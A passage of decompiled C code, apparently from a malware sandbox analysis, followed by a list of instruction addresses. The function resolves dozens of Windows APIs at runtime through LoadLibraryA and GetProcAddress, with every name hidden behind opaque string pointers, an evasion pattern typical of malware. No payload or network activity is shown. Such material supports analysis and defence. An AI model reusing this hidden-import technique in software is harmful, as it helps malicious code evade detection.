				CHAR* _t374;
				CHAR* _t375;
				CHAR* _t376;
				struct HINSTANCE__* _t377;
				CHAR* _t378;
				struct HINSTANCE__* _t379;
				CHAR* _t380;
				struct HINSTANCE__* _t381;
				CHAR* _t382;
				struct HINSTANCE__* _t383;
				CHAR* _t384;
				struct HINSTANCE__* _t385;
				CHAR* _t386;
				struct HINSTANCE__* _t387;
				CHAR* _t388;
				struct HINSTANCE__* _t389;
				CHAR* _t390;
				struct HINSTANCE__* _t391;
				CHAR* _t392;
				struct HINSTANCE__* _t393;
				CHAR* _t394;
				struct HINSTANCE__* _t395;
				CHAR* _t396;
				struct HINSTANCE__* _t397;
				CHAR* _t398;
				struct HINSTANCE__* _t399;
				CHAR* _t400;
				struct HINSTANCE__* _t401;
				CHAR* _t402;
				struct HINSTANCE__* _t403;
				CHAR* _t404;
				struct HINSTANCE__* _t405;
				CHAR* _t406;
				struct HINSTANCE__* _t407;
				CHAR* _t408;
				struct HINSTANCE__* _t409;
				CHAR* _t410;
				struct HINSTANCE__* _t411;
				CHAR* _t412;
				struct HINSTANCE__* _t413;
				CHAR* _t414;
				struct HINSTANCE__* _t415;
				CHAR* _t416;
				struct HINSTANCE__* _t417;
				CHAR* _t418;
				struct HINSTANCE__* _t419;
				CHAR* _t420;
				struct HINSTANCE__* _t421;
				CHAR* _t422;
				struct HINSTANCE__* _t423;
				CHAR* _t424;
				struct HINSTANCE__* _t425;
				CHAR* _t426;
				struct HINSTANCE__* _t427;
				CHAR* _t428;
				struct HINSTANCE__* _t429;
				CHAR* _t430;
				struct HINSTANCE__* _t431;
				CHAR* _t432;
				struct HINSTANCE__* _t433;
				CHAR* _t434;
				struct HINSTANCE__* _t435;
				CHAR* _t436;
				struct HINSTANCE__* _t437;
				CHAR* _t438;
				struct HINSTANCE__* _t439;
				CHAR* _t440;
				struct HINSTANCE__* _t441;
				CHAR* _t442;

				_t1 =  *0x29dd856c; // 0x74ab0000
				if(_t1 != 0) {
					_t309 =  *0x29dd7a74; // 0x15a20e8
					_t154 = GetProcAddress(_t1, _t309);
					_t404 =  *0x29dd7a80; // 0x15a2b58
					 *0x29dd8558 = _t154;
					_t155 =  *0x29dd856c; // 0x74ab0000
					_t156 = GetProcAddress(_t155, _t404);
					_t310 =  *0x29dd7b0c; // 0x15a2268
					_t405 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd85d8 = _t156;
					_t157 = GetProcAddress(_t405, _t310);
					_t311 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8540 = _t157;
					_t158 =  *0x29dd80b0; // 0x1596b88
					_t159 = GetProcAddress(_t311, _t158);
					_t406 =  *0x29dd812c; // 0x15a2298
					 *0x29dd8414 = _t159;
					_t160 =  *0x29dd856c; // 0x74ab0000
					_t161 = GetProcAddress(_t160, _t406);
					_t312 =  *0x29dd7e8c; // 0x15a2c78
					_t407 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd840c = _t161;
					_t162 = GetProcAddress(_t407, _t312);
					_t313 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84b8 = _t162;
					_t163 =  *0x29dd7afc; // 0x15a22b0
					_t164 = GetProcAddress(_t313, _t163);
					_t408 =  *0x29dd7d78; // 0x15a2310
					 *0x29dd85c8 = _t164;
					_t165 =  *0x29dd856c; // 0x74ab0000
					_t166 = GetProcAddress(_t165, _t408);
					_t314 =  *0x29dd81c8; // 0x15a2100
					_t409 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8504 = _t166;
					_t167 = GetProcAddress(_t409, _t314);
					_t315 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd857c = _t167;
					_t168 =  *0x29dd813c; // 0x15a2148
					_t169 = GetProcAddress(_t315, _t168);
					_t410 =  *0x29dd8114; // 0x15a2130
					 *0x29dd83b4 = _t169;
					_t170 =  *0x29dd856c; // 0x74ab0000
					_t171 = GetProcAddress(_t170, _t410);
					_t316 =  *0x29dd82a8; // 0x15a22c8
					_t411 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8590 = _t171;
					_t172 = GetProcAddress(_t411, _t316);
					_t317 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84dc = _t172;
					_t173 =  *0x29dd7cc8; // 0x15a2178
					_t174 = GetProcAddress(_t317, _t173);
					_t412 =  *0x29dd7fac; // 0x15a2b38
					 *0x29dd83b8 = _t174;
					_t175 =  *0x29dd856c; // 0x74ab0000
					_t176 = GetProcAddress(_t175, _t412);
					_t318 =  *0x29dd7f48; // 0x15a22e0
					_t413 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84b4 = _t176;
					_t177 = GetProcAddress(_t413, _t318);
					_t319 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8418 = _t177;
					_t178 =  *0x29dd7fd4; // 0x15a2190
					_t179 = GetProcAddress(_t319, _t178);
					_t414 =  *0x29dd7a70; // 0x15a21a8
					 *0x29dd83f8 = _t179;
					_t180 =  *0x29dd856c; // 0x74ab0000
					_t181 = GetProcAddress(_t180, _t414);
					_t320 =  *0x29dd817c; // 0x15a2bd8
					_t415 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd85cc = _t181;
					_t182 = GetProcAddress(_t415, _t320);
					_t321 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8394 = _t182;
					_t183 =  *0x29dd7fc0; // 0x15a2280
					_t184 = GetProcAddress(_t321, _t183);
					_t416 =  *0x29dd8078; // 0x15a20d0
					 *0x29dd85e0 = _t184;
					_t185 =  *0x29dd856c; // 0x74ab0000
					_t186 = GetProcAddress(_t185, _t416);
					_t322 =  *0x29dd7cc4; // 0x15a2370
					_t417 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8438 = _t186;
					_t187 = GetProcAddress(_t417, _t322);
					_t323 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83a8 = _t187;
					_t188 =  *0x29dd7f50; // 0x15a2328
					_t189 = GetProcAddress(_t323, _t188);
					_t418 =  *0x29dd7e24; // 0x15a2388
					 *0x29dd84e8 = _t189;
					_t190 =  *0x29dd856c; // 0x74ab0000
					_t191 = GetProcAddress(_t190, _t418);
					_t324 =  *0x29dd7b34; // 0x15a22f8
					_t419 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8498 = _t191;
					_t192 = GetProcAddress(_t419, _t324);
					_t325 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83cc = _t192;
					_t193 =  *0x29dd7bf8; // 0x15a21f0
					_t194 = GetProcAddress(_t325, _t193);
					_t420 =  *0x29dd7dd0; // 0x15a2208
					 *0x29dd8360 = _t194;
					_t195 =  *0x29dd856c; // 0x74ab0000
					_t196 = GetProcAddress(_t195, _t420);
					_t326 =  *0x29dd7eec; // 0x15a2220
					_t421 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd85dc = _t196;
					 *0x29dd83ec = GetProcAddress(_t421, _t326);
					_t198 =  *0x29dd7c1c; // 0x15a2c18
					_t327 =  *0x29dd856c; // 0x74ab0000
					_t199 = GetProcAddress(_t327, _t198);
					_t422 =  *0x29dd7f2c; // 0x15a4808
					 *0x29dd8494 = _t199;
					_t200 =  *0x29dd856c; // 0x74ab0000
					_t201 = GetProcAddress(_t200, _t422);
					_t328 =  *0x29dd8004; // 0x15a49d0
					_t423 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8510 = _t201;
					_t202 = GetProcAddress(_t423, _t328);
					_t329 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd836c = _t202;
					_t203 =  *0x29dd8288; // 0x15a2958
					_t204 = GetProcAddress(_t329, _t203);
					_t424 =  *0x29dd8058; // 0x1597100
					 *0x29dd85b0 = _t204;
					_t205 =  *0x29dd856c; // 0x74ab0000
					_t206 = GetProcAddress(_t205, _t424);
					_t330 =  *0x29dd7e10; // 0x15a48e0
					_t425 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd85d0 = _t206;
					_t207 = GetProcAddress(_t425, _t330);
					_t331 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83c8 = _t207;
					_t208 =  *0x29dd7a7c; // 0x15a4820
					_t209 = GetProcAddress(_t331, _t208);
					_t426 =  *0x29dd7e84; // 0x15a2998
					 *0x29dd8424 = _t209;
					_t210 =  *0x29dd856c; // 0x74ab0000
					_t211 = GetProcAddress(_t210, _t426);
					_t332 =  *0x29dd7f9c; // 0x15a48f8
					_t427 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8398 = _t211;
					_t212 = GetProcAddress(_t427, _t332);
					_t333 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83d0 = _t212;
					_t213 =  *0x29dd7ba0; // 0x15a4898
					_t214 = GetProcAddress(_t333, _t213);
					_t428 =  *0x29dd7d24; // 0x15a2c98
					 *0x29dd85a8 = _t214;
					_t215 =  *0x29dd856c; // 0x74ab0000
					_t216 = GetProcAddress(_t215, _t428);
					_t334 =  *0x29dd7c60; // 0x15a4a18
					_t429 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84c4 = _t216;
					_t217 = GetProcAddress(_t429, _t334);
					_t335 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84a8 = _t217;
					_t218 =  *0x29dd8128; // 0x15a4940
					_t219 = GetProcAddress(_t335, _t218);
					_t430 =  *0x29dd8080; // 0x15a4a30
					 *0x29dd855c = _t219;
					_t220 =  *0x29dd856c; // 0x74ab0000
					_t221 = GetProcAddress(_t220, _t430);
					_t336 =  *0x29dd7bd0; // 0x15a2c58
					_t431 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8420 = _t221;
					_t222 = GetProcAddress(_t431, _t336);
					_t337 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8470 = _t222;
					_t223 =  *0x29dd7af8; // 0x15a2918
					_t224 = GetProcAddress(_t337, _t223);
					_t432 =  *0x29dd7a5c; // 0x15a29d8
					 *0x29dd8364 = _t224;
					_t225 =  *0x29dd856c; // 0x74ab0000
					_t226 = GetProcAddress(_t225, _t432);
					_t338 =  *0x29dd7eb0; // 0x15a4880
					_t433 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8530 = _t226;
					_t227 = GetProcAddress(_t433, _t338);
					_t339 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd851c = _t227;
					_t228 =  *0x29dd7ea8; // 0x15a48b0
					_t229 = GetProcAddress(_t339, _t228);
					_t434 =  *0x29dd7a60; // 0x15a2938
					 *0x29dd84d8 = _t229;
					_t230 =  *0x29dd856c; // 0x74ab0000
					_t231 = GetProcAddress(_t230, _t434);
					_t340 =  *0x29dd7b60; // 0x15a2af8
					_t435 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd85b4 = _t231;
					_t232 = GetProcAddress(_t435, _t340);
					_t341 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83a4 = _t232;
					_t233 =  *0x29dd7bbc; // 0x1597128
					_t234 = GetProcAddress(_t341, _t233);
					_t436 =  *0x29dd81a0; // 0x15a2a38
					 *0x29dd84b0 = _t234;
					_t235 =  *0x29dd856c; // 0x74ab0000
					_t236 = GetProcAddress(_t235, _t436);
					_t342 =  *0x29dd80e8; // 0x15a2c38
					_t437 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83f0 = _t236;
					_t237 = GetProcAddress(_t437, _t342);
					_t343 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83ac = _t237;
					_t238 =  *0x29dd8200; // 0x15a49e8
					_t239 = GetProcAddress(_t343, _t238);
					_t438 =  *0x29dd82c8; // 0x15a4a00
					 *0x29dd858c = _t239;
					_t240 =  *0x29dd856c; // 0x74ab0000
					_t241 = GetProcAddress(_t240, _t438);
					_t344 =  *0x29dd7ce4; // 0x15a4838
					_t439 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8380 = _t241;
					 *0x29dd8508 = GetProcAddress(_t439, _t344);
					_t243 =  *0x29dd7e74; // 0x1597240
					_t345 =  *0x29dd856c; // 0x74ab0000
					_t244 = GetProcAddress(_t345, _t243);
					_t440 =  *0x29dd7b64; // 0x15a4958
					 *0x29dd8564 = _t244;
					_t245 =  *0x29dd856c; // 0x74ab0000
					_t246 = GetProcAddress(_t245, _t440);
					_t346 =  *0x29dd7be0; // 0x15a4910
					_t441 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd83d4 = _t246;
					_t247 = GetProcAddress(_t441, _t346);
					_t347 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84ac = _t247;
					_t248 =  *0x29dd811c; // 0x15a2a78
					_t249 = GetProcAddress(_t347, _t248);
					_t442 =  *0x29dd7e5c; // 0x15a29f8
					 *0x29dd8404 = _t249;
					_t250 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8354 = GetProcAddress(_t250, _t442);
				}
				_t252 =  *0x29dd7d80; // 0x15a24d8
				_t2 = LoadLibraryA(_t252);
				_t348 =  *0x29dd7c04; // 0x15a24c0
				 *0x29dd8534 = _t2; // executed
				_t3 = LoadLibraryA(_t348); // executed
				 *0x29dd8440 = _t3;
				_t4 =  *0x29dd7d48; // 0x15a2538
				_t5 = LoadLibraryA(_t4);
				_t253 =  *0x29dd7b38; // 0x15a2040
				 *0x29dd83e0 = _t5;
				_t6 = LoadLibraryA(_t253);
				_t349 =  *0x29dd81a8; // 0x15a2028
				 *0x29dd8488 = _t6;
				 *0x29dd847c = LoadLibraryA(_t349);
				_t8 =  *0x29dd7ac0; // 0x15a2568
				_t9 = LoadLibraryA(_t8);
				_t254 =  *0x29dd7c7c; // 0x15a2448
				 *0x29dd85a4 = _t9; // executed
				_t10 = LoadLibraryA(_t254);
				_t350 =  *0x29dd7c5c; // 0x15a4ac0
				 *0x29dd8454 = _t10; // executed
				_t11 = LoadLibraryA(_t350); // executed
				 *0x29dd8598 = _t11;
				_t12 =  *0x29dd8084; // 0x15a4a90
				_t13 = LoadLibraryA(_t12);
				_t255 =  *0x29dd7f68; // 0x15a4928
				 *0x29dd846c = _t13; // executed
				_t14 = LoadLibraryA(_t255);
				_t351 =  *0x29dd7df8; // 0x15a4850
				 *0x29dd8588 = _t14; // executed
				_t15 = LoadLibraryA(_t351); // executed
				 *0x29dd8444 = _t15;
				_t16 =  *0x29dd8534; // 0x75340000
				if(_t16 != 0) {
					_t305 =  *0x29dd7b1c; // 0x1596e80
					_t145 = GetProcAddress(_t16, _t305);
					_t400 =  *0x29dd81fc; // 0x159c8b0
					 *0x29dd8464 = _t145;
					_t146 =  *0x29dd8534; // 0x75340000
					_t147 = GetProcAddress(_t146, _t400);
					_t306 =  *0x29dd7fb4; // 0x1596ea8
					_t401 =  *0x29dd8534; // 0x75340000
					 *0x29dd8518 = _t147;
					_t148 = GetProcAddress(_t401, _t306);
					_t307 =  *0x29dd8534; // 0x75340000
					 *0x29dd8410 = _t148;
					_t149 =  *0x29dd7dc4; // 0x159c670
					_t150 = GetProcAddress(_t307, _t149);
					_t402 =  *0x29dd7fcc; // 0x1596ef8
					 *0x29dd83e8 = _t150;
					_t151 =  *0x29dd8534; // 0x75340000
					_t152 = GetProcAddress(_t151, _t402);
					_t308 =  *0x29dd7ad4; // 0x15a2520
					_t403 =  *0x29dd8534; // 0x75340000
					 *0x29dd83c4 = _t152;
					 *0x29dd8568 = GetProcAddress(_t403, _t308);
				}
				_t17 =  *0x29dd8440; // 0x76120000
				if(_t17 != 0) {
					_t303 =  *0x29dd7db4; // 0x159c7d0
					_t141 = GetProcAddress(_t17, _t303);
					_t398 =  *0x29dd7b50; // 0x15a2a18
					 *0x29dd8428 = _t141;
					_t142 =  *0x29dd8440; // 0x76120000
					_t143 = GetProcAddress(_t142, _t398);
					_t304 =  *0x29dd7ae0; // 0x159c630
					_t399 =  *0x29dd8440; // 0x76120000
					 *0x29dd835c = _t143;
					 *0x29dd84e0 = GetProcAddress(_t399, _t304);
				}
				_t18 =  *0x29dd8358; // 0x76c60000
				if(_t18 != 0) {
					_t293 =  *0x29dd8190; // 0x15a26a0
					_t117 = GetProcAddress(_t18, _t293);
					_t388 =  *0x29dd7fe4; // 0x159c830
					 *0x29dd8448 = _t117;
					_t118 =  *0x29dd8358; // 0x76c60000
					_t119 = GetProcAddress(_t118, _t388);
					_t294 =  *0x29dd7bc0; // 0x15a2508
					_t389 =  *0x29dd8358; // 0x76c60000
					 *0x29dd842c = _t119;
					_t120 = GetProcAddress(_t389, _t294);
					_t295 =  *0x29dd8358; // 0x76c60000
					 *0x29dd84d0 = _t120;
					_t121 =  *0x29dd8234; // 0x15a2580
					_t122 = GetProcAddress(_t295, _t121);
					_t390 =  *0x29dd7da4; // 0x15a2430
					 *0x29dd85ac = _t122;
					_t123 =  *0x29dd8358; // 0x76c60000
					_t124 = GetProcAddress(_t123, _t390);
					_t296 =  *0x29dd7c68; // 0x15a23d0
					_t391 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8368 = _t124;
					_t125 = GetProcAddress(_t391, _t296);
					_t297 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8574 = _t125;
					_t126 =  *0x29dd8094; // 0x15a2460
					_t127 = GetProcAddress(_t297, _t126);
					_t392 =  *0x29dd8064; // 0x159a6f0
					 *0x29dd8408 = _t127;
					_t128 =  *0x29dd8358; // 0x76c60000
					_t129 = GetProcAddress(_t128, _t392);
					_t298 =  *0x29dd8208; // 0x159c950
					_t393 =  *0x29dd8358; // 0x76c60000
					 *0x29dd844c = _t129;
					_t130 = GetProcAddress(_t393, _t298);
					_t299 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8370 = _t130;
					_t131 =  *0x29dd82c4; // 0x15a48c8
					_t132 = GetProcAddress(_t299, _t131);
					_t394 =  *0x29dd7ff4; // 0x15a2ab8
					 *0x29dd85c0 = _t132;
					_t133 =  *0x29dd8358; // 0x76c60000
					_t134 = GetProcAddress(_t133, _t394);
					_t300 =  *0x29dd80dc; // 0x15a2ad8
					_t395 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8570 = _t134;
					_t135 = GetProcAddress(_t395, _t300);
					_t301 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8430 = _t135;
					_t136 =  *0x29dd7e20; // 0x15a4970
					_t137 = GetProcAddress(_t301, _t136);
					_t396 =  *0x29dd7c44; // 0x15a4988
					 *0x29dd849c = _t137;
					_t138 =  *0x29dd8358; // 0x76c60000
					_t139 = GetProcAddress(_t138, _t396);
					_t302 =  *0x29dd81d0; // 0x15a49a0
					_t397 =  *0x29dd8358; // 0x76c60000
					 *0x29dd8548 = _t139;
					 *0x29dd83c0 = GetProcAddress(_t397, _t302);
				}
				_t19 =  *0x29dd83e0; // 0x73070000
				if(_t19 != 0) {
					_t284 =  *0x29dd7cac; // 0x159c6f0
					_t96 = GetProcAddress(_t19, _t284);
					_t380 =  *0x29dd8028; // 0x159c8f0
					 *0x29dd8458 = _t96;
					_t97 =  *0x29dd83e0; // 0x73070000
					_t98 = GetProcAddress(_t97, _t380);
					_t285 =  *0x29dd8014; // 0x159c890
					_t381 =  *0x29dd83e0; // 0x73070000
					 *0x29dd8480 = _t98;
					_t99 = GetProcAddress(_t381, _t285);
					_t286 =  *0x29dd83e0; // 0x73070000
					 *0x29dd853c = _t99;
					_t100 =  *0x29dd7fd8; // 0x159c8d0
					_t101 = GetProcAddress(_t286, _t100);
					_t382 =  *0x29dd7cbc; // 0x159c7b0
					 *0x29dd85bc = _t101;
					_t102 =  *0x29dd83e0; // 0x73070000
					_t103 = GetProcAddress(_t102, _t382);
					_t287 =  *0x29dd7f24; // 0x15a2418
					_t383 =  *0x29dd83e0; // 0x73070000
					 *0x29dd8578 = _t103;
					_t104 = GetProcAddress(_t383, _t287);
					_t288 =  *0x29dd83e0; // 0x73070000
					 *0x29dd845c = _t104;
					_t105 =  *0x29dd81e8; // 0x159c710
					_t106 = GetProcAddress(_t288, _t105);
					_t384 =  *0x29dd7e50; // 0x15a25f8
					 *0x29dd838c = _t106;
					_t107 =  *0x29dd83e0; // 0x73070000
					_t108 = GetProcAddress(_t107, _t384);
					_t289 =  *0x29dd8278; // 0x159c850
					_t385 =  *0x29dd83e0; // 0x73070000
					 *0x29dd85d4 = _t108;
					_t109 = GetProcAddress(_t385, _t289);
					_t290 =  *0x29dd83e0; // 0x73070000
					 *0x29dd84a0 = _t109;
					_t110 =  *0x29dd7cd8; // 0x159c730
					_t111 = GetProcAddress(_t290, _t110);
					_t386 =  *0x29dd7ef4; // 0x159c790
					 *0x29dd8460 = _t111;
					_t112 =  *0x29dd83e0; // 0x73070000
					_t113 = GetProcAddress(_t112, _t386);
					_t291 =  *0x29dd8258; // 0x159c9d0
					_t387 =  *0x29dd83e0; // 0x73070000
					 *0x29dd8350 = _t113;
					_t114 = GetProcAddress(_t387, _t291);
					_t292 =  *0x29dd83e0; // 0x73070000
					 *0x29dd843c = _t114;
					_t115 =  *0x29dd81e4; // 0x15a2d58
					 *0x29dd83fc = GetProcAddress(_t292, _t115);
				}
				_t20 =  *0x29dd8488; // 0x749d0000
				if(_t20 != 0) {
					_t375 =  *0x29dd7cd4; // 0x159c7f0
					_t85 = GetProcAddress(_t20, _t375);
					_t280 =  *0x29dd8488; // 0x749d0000
					 *0x29dd83bc = _t85;
					_t86 =  *0x29dd80f0; // 0x15a24a8
					_t87 = GetProcAddress(_t280, _t86);
					_t376 =  *0x29dd7d20; // 0x15a1a40
					 *0x29dd839c = _t87;
					_t88 =  *0x29dd8488; // 0x749d0000
					_t89 = GetProcAddress(_t88, _t376);
					_t281 =  *0x29dd80b4; // 0x15a23e8
					_t377 =  *0x29dd8488; // 0x749d0000
					 *0x29dd837c = _t89;
					_t90 = GetProcAddress(_t377, _t281);
					_t282 =  *0x29dd8488; // 0x749d0000
					 *0x29dd8538 = _t90;
					_t91 =  *0x29dd7f58; // 0x15a2598
					_t92 = GetProcAddress(_t282, _t91);
					_t378 =  *0x29dd7bec; // 0x15a2610
					 *0x29dd84d4 = _t92;
					_t93 =  *0x29dd8488; // 0x749d0000
					_t94 = GetProcAddress(_t93, _t378);
					_t283 =  *0x29dd8290; // 0x159c870
					_t379 =  *0x29dd8488; // 0x749d0000
					 *0x29dd8468 = _t94;
					 *0x29dd8450 = GetProcAddress(_t379, _t283);
				}
				_t21 =  *0x29dd847c; // 0x763c0000
				if(_t21 != 0) {
					_t277 =  *0x29dd7f60; // 0x159c970
					_t77 = GetProcAddress(_t21, _t277);
					_t372 =  *0x29dd7d74; // 0x15a2640
					 *0x29dd83d8 = _t77;
					_t78 =  *0x29dd847c; // 0x763c0000
					_t79 = GetProcAddress(_t78, _t372);
					_t278 =  *0x29dd8254; // 0x15a47f0
					_t373 =  *0x29dd847c; // 0x763c0000
					 *0x29dd8528 = _t79;
					_t80 = GetProcAddress(_t373, _t278);
					_t279 =  *0x29dd847c; // 0x763c0000
					 *0x29dd8544 = _t80;
					_t81 =  *0x29dd7ba8; // 0x15a2d78
					_t82 = GetProcAddress(_t279, _t81);
					_t374 =  *0x29dd7e58; // 0x15a2fb8
					 *0x29dd848c = _t82;
					_t83 =  *0x29dd847c; // 0x763c0000
					 *0x29dd8388 = GetProcAddress(_t83, _t374);
				}
				_t22 =  *0x29dd85a4; // 0x76220000
				if(_t22 != 0) {
					_t270 =  *0x29dd80e0; // 0x159c990
					_t59 = GetProcAddress(_t22, _t270);
					_t365 =  *0x29dd7e78; // 0x15a25c8
					 *0x29dd8378 = _t59;
					_t60 =  *0x29dd85a4; // 0x76220000
					_t61 = GetProcAddress(_t60, _t365);
					_t271 =  *0x29dd80cc; // 0x15a2a58
					_t366 =  *0x29dd85a4; // 0x76220000
					 *0x29dd8524 = _t61;
					_t62 = GetProcAddress(_t366, _t271);
					_t272 =  *0x29dd85a4; // 0x76220000
					 *0x29dd84f0 = _t62;
					_t63 =  *0x29dd8120; // 0x15a25b0
					_t64 = GetProcAddress(_t272, _t63);
					_t367 =  *0x29dd8118; // 0x15a1a30
					 *0x29dd8384 = _t64;
					_t65 =  *0x29dd85a4; // 0x76220000
					_t66 = GetProcAddress(_t65, _t367);
					_t273 =  *0x29dd7d70; // 0x15a2550
					_t368 =  *0x29dd85a4; // 0x76220000
					 *0x29dd85a0 = _t66;
					_t67 = GetProcAddress(_t368, _t273);
					_t274 =  *0x29dd85a4; // 0x76220000
					 *0x29dd8374 = _t67;
					_t68 =  *0x29dd7fc8; // 0x15a2b18
					_t69 = GetProcAddress(_t274, _t68);
					_t369 =  *0x29dd7cf4; // 0x15a2cb8
					 *0x29dd84fc = _t69;
					_t70 =  *0x29dd85a4; // 0x76220000
					_t71 = GetProcAddress(_t70, _t369);
					_t275 =  *0x29dd7de8; // 0x15a49b8
					_t370 =  *0x29dd85a4; // 0x76220000
					 *0x29dd85b8 = _t71;
					_t72 = GetProcAddress(_t370, _t275);
					_t276 =  *0x29dd85a4; // 0x76220000
					 *0x29dd85c4 = _t72;
					_t73 =  *0x29dd7f88; // 0x15a4868
					_t74 = GetProcAddress(_t276, _t73);
					_t371 =  *0x29dd7df4; // 0x15a4a48
					 *0x29dd8560 = _t74;
					_t75 =  *0x29dd85a4; // 0x76220000
					 *0x29dd8594 = GetProcAddress(_t75, _t371);
				}
				_t23 =  *0x29dd8454; // 0x76b20000
				if(_t23 != 0) {
					_t268 =  *0x29dd7e18; // 0x15a28f8
					_t55 = GetProcAddress(_t23, _t268);
					_t363 =  *0x29dd8024; // 0x15a28d8
					 *0x29dd854c = _t55;
					_t56 =  *0x29dd8454; // 0x76b20000
					_t57 = GetProcAddress(_t56, _t363);
					_t269 =  *0x29dd8100; // 0x15a2bb8
					_t364 =  *0x29dd8454; // 0x76b20000
					 *0x29dd83b0 = _t57;
					 *0x29dd84a4 = GetProcAddress(_t364, _t269);
				}
				_t24 =  *0x29dd8598; // 0x755e0000
				if(_t24 != 0) {
					_t266 =  *0x29dd7ddc; // 0x15a4a60
					_t51 = GetProcAddress(_t24, _t266);
					_t361 =  *0x29dd7ac4; // 0x15a2f18
					 *0x29dd8584 = _t51;
					_t52 =  *0x29dd8598; // 0x755e0000
					_t53 = GetProcAddress(_t52, _t361);
					_t267 =  *0x29dd7ccc; // 0x15a2e38
					_t362 =  *0x29dd8598; // 0x755e0000
					 *0x29dd8478 = _t53;
					 *0x29dd8500 = GetProcAddress(_t362, _t267);
				}
				_t25 =  *0x29dd846c; // 0x75f30000
				if(_t25 != 0) {
					_t262 =  *0x29dd7db8; // 0x15a4a78
					_t42 = GetProcAddress(_t25, _t262);
					_t357 =  *0x29dd7b04; // 0x15a4aa8
					 *0x29dd85e4 = _t42;
					_t43 =  *0x29dd846c; // 0x75f30000
					_t44 = GetProcAddress(_t43, _t357);
					_t263 =  *0x29dd7bb8; // 0x15a4ad8
					_t358 =  *0x29dd846c; // 0x75f30000
					 *0x29dd841c = _t44;
					_t45 = GetProcAddress(_t358, _t263);
					_t264 =  *0x29dd846c; // 0x75f30000
					 *0x29dd8550 = _t45;
					_t46 =  *0x29dd7cb0; // 0x15a4be0
					_t47 = GetProcAddress(_t264, _t46);
					_t359 =  *0x29dd816c; // 0x15a18c0
					 *0x29dd84e4 = _t47;
					_t48 =  *0x29dd846c; // 0x75f30000
					_t49 = GetProcAddress(_t48, _t359);
					_t265 =  *0x29dd8054; // 0x15a2df8
					_t360 =  *0x29dd846c; // 0x75f30000
					 *0x29dd83a0 = _t49;
					 *0x29dd83dc = GetProcAddress(_t360, _t265);
				}
				_t26 =  *0x29dd8588; // 0x73990000
				if(_t26 != 0) {
					_t261 =  *0x29dd7edc; // 0x15a4c88
					 *0x29dd8490 = GetProcAddress(_t26, _t261);
				}
				_t27 =  *0x29dd8444; // 0x734d0000
				if(_t27 != 0) {
					_t352 =  *0x29dd7e40; // 0x15970b0
					_t28 = GetProcAddress(_t27, _t352);
					_t256 =  *0x29dd8444; // 0x734d0000
					 *0x29dd83e4 = _t28;
					_t29 =  *0x29dd7cf8; // 0x15a2dd8
					_t30 = GetProcAddress(_t256, _t29);
					_t353 =  *0x29dd7d60; // 0x1597290
					 *0x29dd8434 = _t30;
					_t31 =  *0x29dd8444; // 0x734d0000
					_t32 = GetProcAddress(_t31, _t353);
					_t257 =  *0x29dd7b78; // 0x15a4af0
					_t354 =  *0x29dd8444; // 0x734d0000
					 *0x29dd84ec = _t32;
					_t33 = GetProcAddress(_t354, _t257);
					_t258 =  *0x29dd8444; // 0x734d0000
					 *0x29dd852c = _t33;
					_t34 =  *0x29dd7f90; // 0x15a4bf8
					_t35 = GetProcAddress(_t258, _t34);
					_t355 =  *0x29dd82b0; // 0x15a2f78
					 *0x29dd850c = _t35;
					_t36 =  *0x29dd8444; // 0x734d0000
					_t37 = GetProcAddress(_t36, _t355);
					_t259 =  *0x29dd7de4; // 0x15a2e58
					_t356 =  *0x29dd8444; // 0x734d0000
					 *0x29dd84c0 = _t37;
					_t38 = GetProcAddress(_t356, _t259);
					_t260 =  *0x29dd8444; // 0x734d0000
					 *0x29dd8400 = _t38;
					_t39 =  *0x29dd82a4; // 0x15a4b50
					_t40 = GetProcAddress(_t260, _t39);
					 *0x29dd8580 = _t40;
					return _t40;
				}
				return _t27;
			}














































































































































































































































































































































































































































                                        0x29da8390
                                        0x29da8397
                                        0x29da839d
                                        0x29da83a5
                                        0x29da83ab
                                        0x29da83b1
                                        0x29da83b6
                                        0x29da83bd
                                        0x29da83c3
                                        0x29da83c9
                                        0x29da83d1
                                        0x29da83d6
                                        0x29da83dc
                                        0x29da83e2
                                        0x29da83e7
                                        0x29da83ee
                                        0x29da83f4
                                        0x29da83fa
                                        0x29da83ff
                                        0x29da8406
                                        0x29da840c
                                        0x29da8412
                                        0x29da841a
                                        0x29da841f
                                        0x29da8425
                                        0x29da842b
                                        0x29da8430
                                        0x29da8437
                                        0x29da843d
                                        0x29da8443
                                        0x29da8448
                                        0x29da844f
